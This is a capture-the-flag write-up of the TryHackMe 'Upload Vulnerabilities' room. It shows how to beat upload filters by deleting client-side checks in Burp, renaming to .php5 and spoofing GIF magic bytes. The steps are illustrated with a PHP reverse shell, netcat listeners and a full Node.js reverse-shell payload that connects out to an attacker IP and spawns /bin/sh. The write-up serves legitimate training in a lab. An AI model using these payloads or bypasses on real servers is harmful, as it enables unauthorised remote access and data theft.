This is the write up for the room Upload Vulnerabilities on Tryhackme and it is part of the Web Fundamentals Path
Make connection with VPN or use the attackbox on Tryhackme site to connect to the Tryhackme lab environment
TASKS Upload Vulnerabilities
Task 1
Follow along this task. It is self-explanatory. This is very important otherwise you will not be able to clear the rest of this room
It is only one command you need to enter in the terminal
echo "<MACHINE_IP> overwrite.uploadvulns.thm shell.uploadvulns.thm java.uploadvulns.thm annex.uploadvulns.thm magic.uploadvulns.thm jewel.uploadvulns.thm" | sudo tee -a /etc/hosts
to revert
sudo sed -i '$d' /etc/hosts
Task 2
Read all that is in this task and press complete
Task 3
Read all that is in this task and press complete
Task 4
Read all that is in this task
4.1 What is the name of the image file which can be overwritten?
Open the website http://overwrite.uploadvulns.thm/
Right click and view image info
data:image/s3,"s3://crabby-images/634be/634becec0fc21d2e895a411e42267098abe084ab" alt="Upload Vulnerabilities writeup on Tryhackme"
data:image/s3,"s3://crabby-images/a11ea/a11ea1092d6c5c4fe05daa993ed0a6abb84231fc" alt="Upload Vulnerabilities writeup on Tryhackme"
4.2 Overwrite the image. What is the flag you receive?
Now upload a files called mountains.jpg
data:image/s3,"s3://crabby-images/cde52/cde523096fd0dfbb20149138b1901b8ab8a1fd4f" alt="Overwrite file"
Task 5
Read all that is in the task
Navigate to shell.uploadvulns.thm
and complete the questions for this task.
5.1 Run a Gobuster scan on the website using the syntax from the screenshot above. What directory looks like it might be used for uploads? (N.B. This is a good habit to get into, and will serve you well in the upcoming tasks…)
First we run gobuster by typing in
gobuster -u http://shell.uploadvulns.thm dir --wordlist /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
Type in the command and do not copy it. Sometime this will give errors
data:image/s3,"s3://crabby-images/7cbfe/7cbfed7d032445ad3ff37bc4fdd6dfa2edd4407a" alt="gobuster"
Now upload a files so we can see where it is added ( select the file then press upload ). I have uploaded mountains.jpg
And we see it in resources
data:image/s3,"s3://crabby-images/c9753/c975363246679d05b1dbd80ad952e53657a1cb9a" alt="Upload Vulnerabilities writeup on Tryhackme"
5.2 Get either a web shell or a reverse shell on the machine.
What’s the flag in the /var/www/ directory of the server?
Let’s go for a reverse shell.
first we need to copy the correct shell to use. It come with KALI
Type in the following command to copy the webshell.php so we can edit it and leave the source as it is
cp /usr/share/webshells/php/php-reverse-shell.php ~/Downloads/shell.php
cd ~/Downloads/
nano shell.php
Now change the ip to you tun0 IP
data:image/s3,"s3://crabby-images/15666/15666e3103013875aa962a8a120276e1a1118822" alt="Upload Vulnerabilities writeup on Tryhackme"
We leave the port as is. now press control+x to exit and save
Start a listner by typing in the following command
nc -nlvp 1234
Now upload the shell.php and check the resources page
data:image/s3,"s3://crabby-images/07022/07022c7524b6cf56b68d60e041f9d2aa31010802" alt="Upload Vulnerabilities writeup on Tryhackme"
Now click on this and go back to the terminal where we have started the listner
data:image/s3,"s3://crabby-images/684d0/684d08c230a5c741c36071bf21dbfaf8016f7a89" alt="netcat"
and we have a shel
now type in
cd /var/www
ls
cat flag.txt
Task 6
Read all that is in the task.
6.1 What is the traditional server-side scripting language?
Answer: php
6.2 When validating by file extension, what would you call a list of accepted extensions (whereby the server rejects any extension not in the list)?
Answer: Correct Answer
6.3 [Research] What MIME type would you expect to see when uploading a CSV file?
You can guess this one. a cvs file is always a txt file. As multiple system can read it
Answer text/csv
Task 7
Read all that is in the task
7.1 What is the flag in /var/www/?
If you want to scan with gobuster you can by typing in the following command
gobuster -u http://java.uploadvulns.thm dir --wordlist /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
This will reveal the image and assets directory
We will use the webshell.php in previous task
Start up Burpsuite and put intercept on. Followi this guide if you do not know how to configure Firefox with Burp Configure Burpsuite with Firefox
data:image/s3,"s3://crabby-images/e7136/e71368d7aef363325d72cd3edbeced58f962f069" alt="burp anbd foxyproxy"
data:image/s3,"s3://crabby-images/593f9/593f9a88375febf8a62dd398171574c463aabf56" alt="burpsuite"
Now navigate to the page http://java.uploadvulns.thm/
You will se this
data:image/s3,"s3://crabby-images/e99f5/e99f522e09fd5c991defc936ff6e8c4ffdaaf366" alt="intercept with burp"
Right click and Do intercept -> response to this request
Then press Forward
Now delete the client side filter and press forward
data:image/s3,"s3://crabby-images/1d521/1d521b079369ca859d6d919b7b9aac5f52ec7930" alt="client side check bypass"
Now go back to the site and upload the webshell.php
Once you see the webshell in burp you can turn off burp or press Forward until you see an succefull upload
data:image/s3,"s3://crabby-images/393f7/393f763b6ecd9704847c9b4387d063c94b596941" alt="Upload Vulnerabilities writeup on Tryhackme"
Now start up a listner in a terminal by typing
nc -nlvp 1234
Now go to the image directory we have found and click on the shell.php
http://java.uploadvulns.thm/images/
data:image/s3,"s3://crabby-images/1c608/1c608265868afbb4c2f0eb5fdcd8123c7acd8045" alt="netcat"
cat /var/www/flag.txt
Task 8
Read all that is in the task
8.1 What is the flag in /var/www/?
Firt we do a gobuster by typing in
gobuster -u http://annex.uploadvulns.thm dir --wordlist /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
We find
data:image/s3,"s3://crabby-images/b783d/b783ddb1e008cb0b7cb4264f119f962d05a5ce62" alt="dirbuster"
data:image/s3,"s3://crabby-images/4d3fe/4d3fed39f03c35c569cf63be466826439dd700f9" alt="Upload Vulnerabilities writeup on Tryhackme"
Use the command select to selct a file and then type upload to upload the file. As we notice webshell.php is invalid so we open up the givne wiki page and fin dall the php extensions we can try
data:image/s3,"s3://crabby-images/f282b/f282be9d630bd2b3484d9751879795d31e23d8e3" alt="fin dphp file extenson"
Bij renaming the webshell.php th webshell.php5 and then upload it we have a succes
data:image/s3,"s3://crabby-images/3ffa3/3ffa31896212ba6cfd9f2148678a1be2f1870f1d" alt="Upload Vulnerabilities writeup on Tryhackme"
It laso changes the name. Now start up a lisner with the following command
nc – nlvp 1234
Click on the php5 file in the privacy directory and notice the shell
data:image/s3,"s3://crabby-images/d67e7/d67e7fe0e52756f91734100c7c27d46c4aef0cb6" alt="netcat"
cat out the flag by tiping
cat /var/www/flag.txt
Task 9
9.1 Grab the flag from /var/www/
First we do a dirbuster scan by typing in the following command
gobuster -u http://magic.uploadvulns.thm dir --wordlist /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
data:image/s3,"s3://crabby-images/74943/749439f84c3b973e7936f7a9e67719409e24ad37" alt="dirbuster"
The graphics directory is fobidden
Now we try to upload the shell.php file and we see an error
data:image/s3,"s3://crabby-images/f1670/f16708107c5de63661c26dca79784e3b2dd8ce1b" alt="Upload Vulnerabilities writeup on Tryhackme"
So it wants an gif file. Let’s see if we can do the maic number hack here
first make a copy of the shell.php just in case we need to revert
I will copy and rename the file to magic.php by typing in the followin gcommand
cp shell.php magic.php
data:image/s3,"s3://crabby-images/a513d/a513db308237c5c26d2890636ccc212392db083e" alt="magic"
Here we can find the list of signatures List of file signatures – Wikipedia
for gif it is
data:image/s3,"s3://crabby-images/ccc6e/ccc6e839e05ba3adc2bf47a63216604c19671f55" alt=""
So there are 2.
47 49 46 38 37 61 47 49 46 38 39 61
The number is 6 bytes long. Add AAAAAA to the magic.php file
nano magic.php
data:image/s3,"s3://crabby-images/c30b5/c30b53a480f8afd9f882d0fc2ba81fab70839bbc" alt="Upload Vulnerabilities writeup on Tryhackme"
Save the file then open it in hexeditor by typing
hexeditor magic.php
Now change the bytes to what we have found
data:image/s3,"s3://crabby-images/86d78/86d78f0b30f8468d3cea2d350d9ddc5722958213" alt="hexeditor"
data:image/s3,"s3://crabby-images/d6c0b/d6c0b82bbc84977b5e60e5734900c9979d8e07ac" alt="magic"
Now upload this file
data:image/s3,"s3://crabby-images/7400d/7400d9051d42e1086e68aa0f51ed78a0372eced0" alt="Upload Vulnerabilities writeup on Tryhackme"
Start a listner by typing in
nc -nlvp 1234
Indexing is off on the server so we need to type in the the following
http://magic.uploadvulns.thm/graphics/magic.php
data:image/s3,"s3://crabby-images/35df3/35df3939078b48382a216e9786cbb6e43b1be98a" alt="netcat"
cat /var/www/flag.txt
Task 10
Read all that is in the task and press complete
Task 11
11. Hack the machine and grab the flag from /var/www/
Ok now for the fun part
Run gobuster first
data:image/s3,"s3://crabby-images/bcff1/bcff1a876e48055b3aefeee119c03078dac6267c" alt="dirbuster"
Now go to the site jewel.uploadvulns.thm
Let’s try to upload a file and It is telling me it want an jpg file
data:image/s3,"s3://crabby-images/6451d/6451d23a14b3708d2aa40321b275c58731d69308" alt="Upload Vulnerabilities writeup on Tryhackme"
Looking at the source we see upload.js and clicking on it revels the filters for the client side
data:image/s3,"s3://crabby-images/1c13e/1c13e5b75e03737b34fbac4922e126805bba87f4" alt="Upload Vulnerabilities writeup on Tryhackme"
Let’s try to bypass this client filter and it will probably also be on the server side, However first let us analyse the webpage
data:image/s3,"s3://crabby-images/72286/72286a929204e2c0f1c370c816da90ba403dd4be" alt="wappalyzer"
It is node.js . This means the reverse shell we used probably does not work.
At this page we will find a payload we can use
Payload
(function(){ var net = require("net"), cp = require("child_process"), sh = cp.spawn("/bin/sh", []); var client = new net.Socket(); client.connect(443, "10.0.0.1", function(){ client.pipe(sh.stdin); sh.stdout.pipe(client); sh.stderr.pipe(client); }); return /a/; // Prevents the Node.js application form crashing })();
Save this file as shell.js and adjust the setting in the payload to your IP and use port number 443
Now we need to bypass in order to upload. To do this we need to deactivate the client filter first. Looking at the source we see an upload.js that holds the filters as we have seen.
Startup Burpsuite and turn on intercept
Reload the page by pressing control+F5 so it will flush out the cashed upload.js
In burpsuite forward until you find upload.js
If you do not get this screen then go to options and turn of file extension under intecept client requests
data:image/s3,"s3://crabby-images/bfc04/bfc048abec338239357dfe97587e77446ea41e55" alt="burpsuite"
data:image/s3,"s3://crabby-images/ceef5/ceef5301313c79df331967a71893229f324ab427" alt="burpsuite intercept"
Now click forward until you see this java script
data:image/s3,"s3://crabby-images/83d7e/83d7e43ceb5299148a3622c73d9614c991e5b646" alt="Upload Vulnerabilities writeup on Tryhackme"
Delete the highted functions and press foward
When uploading the file we still get invalid format. change the name of the file to shell.jpg and try again.
data:image/s3,"s3://crabby-images/d5313/d5313ddb782fbfb58e84e1c22bf4faa7dbb3eb33" alt="Upload Vulnerabilities writeup on Tryhackme"
Now we need to find where the file is stored so we can run it
With dirbuster we have found an admin page. navigating to this admin page reveals
data:image/s3,"s3://crabby-images/39038/390386278ca4ed673a2ebcba226ff2040a415d9b" alt="Upload Vulnerabilities writeup on Tryhackme"
This is probably where we need to activate from. It also tels us a module directory
Download the attached given file and use this with dirbuster to scan the found directories
data:image/s3,"s3://crabby-images/8d835/8d8358de3ecde8b8584a425f0b4e0ede622f8555" alt="gobuster"
Im sure our file is here. So let’s upload the file again and the run dirbuster again
data:image/s3,"s3://crabby-images/f8803/f8803a005be7d7483f7d639f4af10e3031032cbc" alt="gobuster"
Now we know where a file is. Now we need to find a way to execute it
First start a listener on port 443 by typing in a terminal
nc -nlvp 443
Going back to the admin page and enter the file name AZC.jpg
data:image/s3,"s3://crabby-images/f6b5e/f6b5e1f97b6d67bd2666e3d6b7b9a5a65eb0eb53" alt="Upload Vulnerabilities writeup on Tryhackme"
Opening burp and intercept the request
data:image/s3,"s3://crabby-images/0474e/0474e997ac5b13fa72472210387d7fc27edeabb9" alt="burpsuite intercept"
Go to the admin page again and now we will go up a directory and in the content directory
data:image/s3,"s3://crabby-images/a734d/a734d44089a93e29101588e01cee740d70c75039" alt="Upload Vulnerabilities writeup on Tryhackme"
Go back to the terminal where the listner started
data:image/s3,"s3://crabby-images/945ec/945ec697419eb78b7027684f502941e2289b4acd" alt="Upload Vulnerabilities writeup on Tryhackme"
cat the flag with the command
cat /var/www/flag.txt
Now we have completed this challenge and the room Upload Vulnerabilities. I must admin I did take a look at the hints. I was more stuck on Burp suite to get the upload.js in order to bypass it. Clear out the Firefox cache an turn off the file extensions in burp did the trick.
Great designs and products for your hacker’s cave
You can get these designs on more than 70 products ranging from
- T-shirt
- mugs
- mousepad
- baseball caps
- Metal prints
- Art Board
And much more.